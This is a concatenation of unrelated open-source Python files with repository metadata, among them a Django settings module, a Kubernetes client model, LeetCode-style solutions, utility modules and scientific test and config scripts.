sizes = [5]
for div in sizes:
if not os.path.exists(img_dir + "full_data_test_div{}".format(div)):
os.makedirs(img_dir + "full_data_test_div{}".format(div))
div_path = img_dir + "full_data_test_div{}\\".format(div)
path_lst = []
#import ipdb;ipdb.set_trace()
for img_path in tqdm(glob(img_dir + "full_data_test\\*")):
img_name = div_path + img_path.split("\\")[-1][:-4] + ".JPG"
img = cv2.imread(img_path)
h, w, c = img.shape
resized_img = cv2.resize(img, (int(w / div), int(h / div)))
cv2.imwrite(img_name, resized_img)
path_lst.append(img_name)
with open(img_dir + "test_div{}.txt".format(div), "w") as f:
for path in path_lst:
f.write("%s\n" % path) | [
"[email protected]"
] | |
99f8326596d1987c00f35288f3c8b12c3991b244 | 3ec1f6d425a6ddc350785947a3a864a4820d926f | /thnthn_2/settings.py | 7cdeadef11fccf37d118cb1e90d65ca99c7cacdb | [] | no_license | crowdbotics-apps/thnthn-2 | a8829b4e627c1865ca18772857d4f3abf599da32 | 15a66f105a233c813f27c20e26aff9d19c08b89e | refs/heads/master | 2022-11-09T06:45:47.205540 | 2020-06-27T01:02:14 | 2020-06-27T01:02:14 | 275,275,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,626 | py | """
Django settings for thnthn_2 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'thnthn_2.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'thnthn_2.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "mandatory"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG:
# output email to console instead of sending
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
] | |
3254f277b9f7bc17109e5f0eb6f62261ecc84387 | 9d278285f2bc899ac93ec887b1c31880ed39bf56 | /ondoc/diagnostic/migrations/0143_merge_20190102_1610.py | 600e06ca0f55228ae1e74f57b7435416c88120fa | [] | no_license | ronit29/docprime | 945c21f8787387b99e4916cb3ba1618bc2a85034 | 60d4caf6c52a8b70174a1f654bc792d825ba1054 | refs/heads/master | 2023-04-01T14:54:10.811765 | 2020-04-07T18:57:34 | 2020-04-07T18:57:34 | 353,953,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | # Generated by Django 2.0.5 on 2019-01-02 10:40
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('diagnostic', '0142_auto_20181229_0505'),
('diagnostic', '0139_auto_20181231_1658'),
]
operations = [
]
| [
"[email protected]"
] | |
fc03b2addf535c39046c40df168afe7cabd0e67c | 14bca3c05f5d8de455c16ec19ac7782653da97b2 | /lib/kubernetes/client/models/v1_local_object_reference.py | 8bdf99cde581bc3d3abefcc9897708676fc092bb | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hovu96/splunk_as_a_service_app | 167f50012c8993879afbeb88a1f2ba962cdf12ea | 9da46cd4f45603c5c4f63ddce5b607fa25ca89de | refs/heads/master | 2020-06-19T08:35:21.103208 | 2020-06-16T19:07:00 | 2020-06-16T19:07:00 | 196,641,210 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,380 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1LocalObjectReference(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str'
}
attribute_map = {
'name': 'name'
}
def __init__(self, name=None):
"""
V1LocalObjectReference - a model defined in Swagger
"""
self._name = None
self.discriminator = None
if name is not None:
self.name = name
@property
def name(self):
"""
Gets the name of this V1LocalObjectReference.
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:return: The name of this V1LocalObjectReference.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this V1LocalObjectReference.
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param name: The name of this V1LocalObjectReference.
:type: str
"""
self._name = name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1LocalObjectReference):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
8ead76d7340deb6bd81fc2eadd7a573efbba4100 | b027af825501f40157921456778e0c2b4a15c313 | /981. Time Based Key-Value Store.py | 58d5a5d50bd834b2811f5474b3f41618627561f5 | [] | no_license | Eustaceyi/Leetcode | bba9db25d940aa1a3ea95b7a97319005adb58655 | 237985eea9853a658f811355e8c75d6b141e40b2 | refs/heads/master | 2020-05-19T08:04:37.101702 | 2020-02-02T01:43:05 | 2020-02-02T01:43:05 | 184,912,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | class TimeMap:
def __init__(self):
"""
Initialize your data structure here.
"""
self.d = {}
def set(self, key: str, value: str, timestamp: int) -> None:
if key not in self.d:
self.d[key] = [(timestamp, value)]
else:
self.d[key].append((timestamp, value))
def get(self, key: str, timestamp: int) -> str:
if key not in self.d:
return ''
else:
import bisect  # needed for the binary search over (timestamp, value) pairs
i = bisect.bisect(self.d[key], (timestamp, chr(127)))
return self.d[key][i-1][1] if i else ''
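# Illustrative check (hypothetical values):
#   obj = TimeMap()
#   obj.set("foo", "bar", 1)
#   obj.get("foo", 1)   # -> "bar"
#   obj.get("foo", 3)   # -> "bar"   (latest value with timestamp <= 3)
#   obj.set("foo", "bar2", 4)
#   obj.get("foo", 4)   # -> "bar2"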
# Your TimeMap object will be instantiated and called as such:
# obj = TimeMap()
# obj.set(key,value,timestamp)
# param_2 = obj.get(key,timestamp) | [
"[email protected]"
] | |
9827030868fdbec7d08cc003e957a3ab49091c27 | 2aace9bb170363e181eb7520e93def25f38dbe5c | /build/idea-sandbox/system/python_stubs/cache/615fe5511019f4d9377f3903f87a6e0b5f40a3c520ef52ec49ceeaa834141943/typing/io.py | aba44effd2b04593bdce89e5f191dfa3f72ded87 | [] | no_license | qkpqkp/PlagCheck | 13cb66fd2b2caa2451690bb72a2634bdaa07f1e6 | d229904674a5a6e46738179c7494488ca930045e | refs/heads/master | 2023-05-28T15:06:08.723143 | 2021-06-09T05:36:34 | 2021-06-09T05:36:34 | 375,235,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,377 | py | # encoding: utf-8
# module typing.io
# from C:\Users\Doly\Anaconda3\lib\site-packages\pandas\_libs\missing.cp37-win_amd64.pyd
# by generator 1.147
""" Wrapper namespace for IO generic classes. """
# imports
import typing as __typing
# no functions
# classes
class IO(__typing.Generic):
"""
Generic base class for TextIO and BinaryIO.
This is an abstract, generic version of the return of open().
NOTE: This does not distinguish between the different possible
classes (text vs. binary, read vs. write vs. read/write,
append-only, unbuffered). The TextIO and BinaryIO subclasses
below capture the distinctions between text vs. binary, which is
pervasive in the interface; however we currently do not offer a
way to track the other distinctions in the type system.
"""
def close(self): # reliably restored by inspect
# no doc
pass
def closed(self): # reliably restored by inspect
# no doc
pass
def fileno(self): # reliably restored by inspect
# no doc
pass
def flush(self): # reliably restored by inspect
# no doc
pass
def isatty(self): # reliably restored by inspect
# no doc
pass
def read(self, n=-1): # reliably restored by inspect
# no doc
pass
def readable(self): # reliably restored by inspect
# no doc
pass
def readline(self, limit=-1): # reliably restored by inspect
# no doc
pass
def readlines(self, hint=-1): # reliably restored by inspect
# no doc
pass
def seek(self, offset, whence=0): # reliably restored by inspect
# no doc
pass
def seekable(self): # reliably restored by inspect
# no doc
pass
def tell(self): # reliably restored by inspect
# no doc
pass
def truncate(self, size=None): # reliably restored by inspect
# no doc
pass
def writable(self): # reliably restored by inspect
# no doc
pass
def write(self, s): # reliably restored by inspect
# no doc
pass
def writelines(self, lines): # reliably restored by inspect
# no doc
pass
def __enter__(self): # reliably restored by inspect
# no doc
pass
def __exit__(self, type, value, traceback): # reliably restored by inspect
# no doc
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
mode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__orig_bases__ = (
typing.Generic[~AnyStr],
)
__parameters__ = (
None, # (!) real value is '~AnyStr'
)
__slots__ = ()
class BinaryIO(__typing.IO):
""" Typed version of the return of open() in binary mode. """
def write(self, s): # reliably restored by inspect
# no doc
pass
def __enter__(self): # reliably restored by inspect
# no doc
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
__orig_bases__ = (
typing.IO[bytes],
)
__parameters__ = ()
__slots__ = ()
class TextIO(__typing.IO):
""" Typed version of the return of open() in text mode. """
def __enter__(self): # reliably restored by inspect
# no doc
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
buffer = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
encoding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
errors = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
line_buffering = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
newlines = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__orig_bases__ = (
typing.IO[str],
)
__parameters__ = ()
__slots__ = ()
# variables with complex values
__all__ = [
'IO',
'TextIO',
'BinaryIO',
]
__weakref__ = None # (!) real value is "<attribute '__weakref__' of 'typing.io' objects>"
| [
"[email protected]"
] | |
812d33ceecf8a2ed47eb5c83d1e0225481655f44 | f338eb32c45d8d5d002a84798a7df7bb0403b3c4 | /Calibration/IsolatedParticles/test/proto_runIsolatedTracksHcal_cfg.py | 34200f8e49f76ae0284d76dd370be5ac5a950c7c | [] | permissive | wouf/cmssw | 0a8a8016e6bebc611f1277379e12bef130464afb | 60da16aec83a0fc016cca9e2a5ed0768ba3b161c | refs/heads/CMSSW_7_3_X | 2022-06-30T04:35:45.380754 | 2015-05-08T17:40:17 | 2015-05-08T17:40:17 | 463,028,972 | 0 | 0 | Apache-2.0 | 2022-02-24T06:05:30 | 2022-02-24T06:05:26 | null | UTF-8 | Python | false | false | 2,875 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("L1SKIM")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 10
process.MessageLogger.categories.append('L1GtTrigReport')
process.MessageLogger.categories.append('HLTrigReport')
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(False)
)
#process.load(INPUTFILELIST)
process.source = cms.Source("PoolSource",fileNames =cms.untracked.vstring(
'/store/mc/Summer10/DiPion_E1to300/GEN-SIM-RECO/START36_V9_S09-v1/0024/4CEE3150-E581-DF11-B9C4-001A92971BDC.root'
))
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(50) )
##################### digi-2-raw plus L1 emulation #########################
process.load("Configuration.StandardSequences.Services_cff")
process.load('Configuration/StandardSequences/GeometryExtended_cff')
process.load('Configuration/StandardSequences/MagneticField_38T_cff')
process.load('TrackingTools/TrackAssociator/DetIdAssociatorESProducer_cff')
#################### Conditions and L1 menu ################################
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
#process.GlobalTag.globaltag = 'START3X_V25B::All'
#process.GlobalTag.globaltag = 'START3X_V27::All'
process.GlobalTag.globaltag = 'START36_V10::All'
process.load('Calibration.IsolatedParticles.isolatedTracksHcalScale_cfi')
process.isolatedTracksHcal.MaxDxyPV = 10.
process.isolatedTracksHcal.MaxDzPV = 10.
process.isolatedTracksHcal.Verbosity = 1
process.primaryVertexFilter = cms.EDFilter("GoodVertexFilter",
vertexCollection = cms.InputTag('offlinePrimaryVertices'),
minimumNDOF = cms.uint32(4) ,
maxAbsZ = cms.double(20.0),
maxd0 = cms.double(10.0)
)
process.TFileService = cms.Service("TFileService",
fileName = cms.string('IsolatedTracksHcalScale.root')
)
# define an EndPath to analyze all other path results
process.hltTrigReport = cms.EDAnalyzer( 'HLTrigReport',
#HLTriggerResults = cms.InputTag( 'TriggerResults','','REDIGI36X')
HLTriggerResults = cms.InputTag( 'TriggerResults','','HLT')
)
process.load("L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi")
#process.l1GtTrigReport.L1GtRecordInputTag = 'simGtDigis'
process.l1GtTrigReport.L1GtRecordInputTag = 'gtDigis'
process.l1GtTrigReport.PrintVerbosity = 0
#=============================================================================
#process.p1 = cms.Path(process.primaryVertexFilter*process.isolatedTracksHcal)
process.p1 = cms.Path( process.isolatedTracksHcal )
| [
"[email protected]"
] | |
eacdc0def0769b9ac87a01477d979d10893e999e | 3345fd9994269b2617e5cbd8f9de879f61544341 | /sklearn_theano/utils/validation.py | 2d75fff7123bf8f257d8b510f1be458631604271 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | khaoulabelahsen/sklearn-theano | 63f927c61732601f684e36d28e9f029246b84a20 | a159d63b913c4f3a7abfb5a46a97a5a39bbc793f | refs/heads/master | 2021-05-18T13:30:17.228526 | 2020-03-30T09:54:29 | 2020-03-30T09:54:29 | 251,263,043 | 1 | 0 | BSD-3-Clause | 2020-03-30T09:45:51 | 2020-03-30T09:45:51 | null | UTF-8 | Python | false | false | 1,974 | py | """Utilities for input validation"""
# License: BSD 3 clause
import numpy as np
def get_minibatch_indices(array, minibatch_size):
""" Get indices for minibatch processing.
Parameters
----------
array : object
Input object to get indices for
minibatch_size : int
Size of minibatches
Returns
-------
list_of_indices : object
A list of (start_index, end_index) tuples.
"""
minibatch_indices = np.arange(0, len(array), minibatch_size)
minibatch_indices = np.asarray(list(minibatch_indices) + [len(array)])
start_indices = minibatch_indices[:-1]
end_indices = minibatch_indices[1:]
return list(zip(start_indices, end_indices))
def check_tensor(array, dtype=None, order=None, n_dim=None, copy=False):
"""Input validation on an array, or list.
The input is converted to a numpy array; `n_dim` can be used to enforce
a minimum number of dimensions.
Parameters
----------
array : object
Input object to check / convert.
dtype : object
Input type to check / convert.
n_dim : int
Number of dimensions for input array. If the input has fewer, it is
expanded with leading dimensions of length 1 until n_dim is matched.
order : 'F', 'C' or None (default=None)
Whether an array will be forced to be fortran or c-style.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
Returns
-------
X_converted : object
The converted and validated X.
"""
array = np.array(array, dtype=dtype, order=order, copy=copy)
if n_dim is not None:
if len(array.shape) > n_dim:
raise ValueError("Input array has shape %s, expected array with "
"%s dimensions or less" % (array.shape, n_dim))
elif len(array.shape) < n_dim:
array = array[(np.newaxis,) * (n_dim - len(array.shape))]  # prepend length-1 axes
return array
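if __name__ == '__main__':
    # Quick illustrative checks (assumed values, shown as a sketch):
    assert get_minibatch_indices(np.arange(10), 4) == [(0, 4), (4, 8), (8, 10)]
    assert check_tensor([1., 2.], n_dim=3).shape == (1, 1, 2)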
| [
"[email protected]"
] | |
ef126642a60cbf935062792af151179cfa4acb7e | 11c24617b0f62bc55b7d2f34eb65fa63e3e3ec06 | /Stacks and Queues - Exercise/10. Cups and Bottles.py | 05eea022bd503beddd8750833b08dd39d18c3a5e | [] | no_license | SilviaKoynova/Python-Advanced | 2d1750a4943b82a82ec910d29241bd3fc473289e | 0a94556592bca60b29a85849a5e694f2eeeda52b | refs/heads/main | 2023-07-18T05:41:33.641250 | 2021-08-26T21:15:13 | 2021-08-26T21:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | from collections import deque
cups_capacity = list(map(int, input().split()))
bottles_with_watter = list(map(int, input().split()))
cups = deque(cups_capacity)
wasted_water = 0
while cups and bottles_with_watter:
current_cup = cups[0]
current_bottle = bottles_with_watter[-1]
if current_cup > current_bottle:
reduced_value = current_cup - current_bottle
current_bottle = bottles_with_watter.pop()
while reduced_value > 0 and bottles_with_watter:
next_bottle = bottles_with_watter[-1]
if next_bottle > reduced_value:
wasted_water += (next_bottle - reduced_value)
reduced_value -= next_bottle
bottles_with_watter.pop()  # this bottle is emptied topping off the cup
else:
reduced_value -= next_bottle
bottles_with_watter.pop()
cups.popleft()
else:
wasted_water += current_bottle - current_cup
bottles_with_watter.pop()
cups.popleft()
if bottles_with_watter:
print(f"Bottles: {' '.join(map(str, bottles_with_watter))}")
elif cups:
print(f"Cups: {' '.join(map(str, cups))}")
print(f"Wasted litters of water: {wasted_water}")
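# Illustrative run (hypothetical input, shown as a sketch):
#   cups:    4 2
#   bottles: 10
# The 10-litre bottle fills the 4-litre cup (6 litres wasted) and the
# bottles run out, so the program prints:
#   Cups: 2
#   Wasted litters of water: 6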
| [
"[email protected]"
] | |
bd543a56885e63c0880db093f6cc7f3b0a5aebd7 | d3cd9012fb535f304d23635145d3fbe71fdbf17e | /geonames/fileutils.py | 7bb9513b06e9cfb8f77f8e62e5dac124d7991570 | [
"Apache-2.0",
"CC-BY-3.0"
] | permissive | flyingdice/geonames-sqlite | 38023e8ffc2e6ff47ee614fc7ea223bfa3079cc2 | acf51d9af723d46815c43509ce22712ce910a61e | refs/heads/master | 2023-02-18T02:06:44.676771 | 2021-01-20T01:48:00 | 2021-01-20T01:48:00 | 109,519,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | """
geonames/fileutils
~~~~~~~~~~~~~~~~~~
Contains utility functions for files.
"""
from typing import IO
def peek_line(f: IO) -> str:
"""
Peek the next line of the given file obj without progressing the pointer.
"""
pos = f.tell()
data = f.readline()
f.seek(pos)
return data
def is_comment(line: str) -> bool:
"""
Return True if the given line is a comment, False otherwise.
"""
return line.startswith('#')
def skip_comments(f: IO) -> None:
"""
Progress the given file obj past all comment lines.
"""
while True:
line = peek_line(f)
if not line or not is_comment(line):
break
f.readline()
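if __name__ == '__main__':
    # Illustrative usage with an in-memory file (assumes '#' comments):
    import io
    f = io.StringIO("# header\n# more\ndata line\n")
    skip_comments(f)
    assert f.readline() == "data line\n"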
| [
"[email protected]"
] | |
20719f4d841e021eca7cb85b8fe056e631ae325c | 91824d746654fe12881b4fc3b55c553aae0d22ac | /py/count-numbers-with-unique-digits.py | 627afa761d56db8cd55409afa5f4afa8c3a6a30b | [
"Apache-2.0"
] | permissive | ckclark/leetcode | a1a173c67a36a3256b198f853fcd3d15aa5abbb7 | 844c6f18d06dcb397db76436e5f4b8ddcb1beddc | refs/heads/master | 2021-01-15T08:14:43.368516 | 2020-02-14T07:25:05 | 2020-02-14T07:30:10 | 42,386,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | class Solution(object):
def countNumbersWithUniqueDigits(self, n):
"""
:type n: int
:rtype: int
"""
n = min(10, n)
ans = 1
for i in xrange(10 - (n - 1), 10 + 1):
ans = ans * i + 1
ans *= 9
ans /= 10
return ans + 1
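# Illustrative sanity check (a sketch; Python 2, matching the
# xrange/integer-division style above). Known counts: f(0)=1, f(1)=10,
# f(2)=91, f(3)=739 (91 plus the 9*9*8 three-digit numbers).
if __name__ == '__main__':
    s = Solution()
    for n, expected in [(0, 1), (1, 10), (2, 91), (3, 739)]:
        assert s.countNumbersWithUniqueDigits(n) == expected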
| [
"[email protected]"
] | |
e83f691304be7f8aaee96e7151f7442647d2fb7c | ac9b453759dbab67d92f88942b7ac41b337e003d | /hudson/hudson-scripts/qiime/test_tree_compare.py | 41856e1636672dce3233f85b256d692af20cdd73 | [] | no_license | carze/clovr-base | 12d8dd405136643b889c3752a360a2efc9405f45 | 617bcb84b087f80a5d5e74ad7ef1616a369d2306 | refs/heads/master | 2021-01-24T01:39:55.353409 | 2014-11-05T15:06:05 | 2014-11-05T15:06:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,386 | py | #!/usr/bin/env python
__author__ = "Justin Kuczynski"
__copyright__ = "Copyright 2010, The QIIME Project"
__credits__ = ["Justin Kuczynski"]
__license__ = "GPL"
__version__ = "1.1.0"
__maintainer__ = "Justin Kuczynski"
__email__ = "[email protected]"
__status__ = "Release"
"""tests the tree_compare.py module."""
from cogent.util.unit_test import TestCase, main
from qiime.parse import parse_newick
import qiime.tree_compare as tc
class TreeCompareTests(TestCase):
""" tests only top level functions
"""
def test_bootstrap_support(self):
""" bootstrap_support should have correct bootstrap for a tree with
unlabeled internal nodes
"""
master_tree = parse_newick('((a:2,b:3):2,(c:1,d:2):7);')
"""
/-------.5 /-a
---1| \-b
\------.5 /-c
\-d
"""
t1 = parse_newick('((a:6,b:8.2):2,(c:1,d:2):7);') # same structure
t2 = parse_newick('((a:2,b:3,c:33):2,d:7);') # abc are siblings
new_master, bootstraps = tc.bootstrap_support(master_tree, [t1, t2])
self.assertFloatEqual(sorted(bootstraps.values()),sorted([1.0, .5, .5]))
def test_bootstrap_support_labeled(self):
""" bootstrap_support should have correct bootstrap on a tree
with labeled internal nodes
"""
master_tree = parse_newick('((a:2,b:3)ab:2,(c:1,d:2)cd:7)rt;')
"""
/-------.5 /-a
---1| \-b
\------.5 /-c
\-d
"""
t1 = parse_newick('((a:6,b:8.2)hi:2,(c:1,d:2):7);') # same structure
t2 = parse_newick('((a:2,b:3,c:33)ho:2,d:7);') # abc are siblings
new_master, bootstraps = tc.bootstrap_support(master_tree, [t1, t2])
expected = dict([('ab', .5),('cd',.5),('rt',1.0)])
self.assertFloatEqual(bootstraps, expected)
def test_bootstrap_support_subset(self):
""" bootstrap_support should have correct bootstrap on a tree
when one support tree is missing a tip
"""
master_tree = parse_newick('((a:2,b:3)ab:2,(c:1,d:2)cd:7)rt;')
"""
/-------.5 /-a
---1| \-b
\------.5 /-c
\-d
"""
t1 = parse_newick('((a:6,b:8.2)hi:2,(c:1,d:2):7);') # same structure
t2 = parse_newick('((a:2,b:3,c:33)ho:2,d:7);') # abc are siblings
t3 = parse_newick('((a:6)hi:2,(c:1,d:2):7);') # b missing
t4 = parse_newick('(a:8,(c:1,d:2):7);') # b missing, and pruned
new_master, bootstraps = tc.bootstrap_support(master_tree,
[t1, t2,t3,t4])
expected = dict([('cd',.75),('rt',1.0)])
self.assertFloatEqual(bootstraps, expected)
def test_tree_support(self):
""" tree_support should correctly modify node.bootstrap_support
"""
master_tree = parse_newick('((a:2,b:3)ab:2,(c:1,d:2)cd:7)rt;')
"""
/-------.5 /-a
---1| \-b
\------.5 /-c
\-d
"""
t2 = parse_newick('((a:2,b:3,c:33)ho:2,d:7);') # abc are siblings
tc.tree_support(master_tree, t2)
self.assertFloatEqual(\
master_tree.getNodeMatchingName('rt').bootstrap_support,1.0)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
9f882bb61120cc1a2aa888581ffeef7eb9ebc90f | 8ad9faa828ce54cddc38dc86eef30e6635babd0c | /RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/globals/topology/openflowcontroller/instructions.py | b089f7f273ad469a5399bb17b1a314f0423ac06b | [
"MIT"
] | permissive | ralfjon/IxNetwork | d1a50069bc5a211f062b2b257cb6775e7cae8689 | c0c834fbc465af69c12fd6b7cee4628baba7fff1 | refs/heads/master | 2020-04-04T00:36:24.956925 | 2018-10-26T16:37:13 | 2018-10-26T16:37:13 | 155,655,988 | 0 | 0 | MIT | 2018-11-01T03:19:30 | 2018-11-01T03:19:30 | null | UTF-8 | Python | false | false | 3,717 | py |
# Copyright 1997 - 2018 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
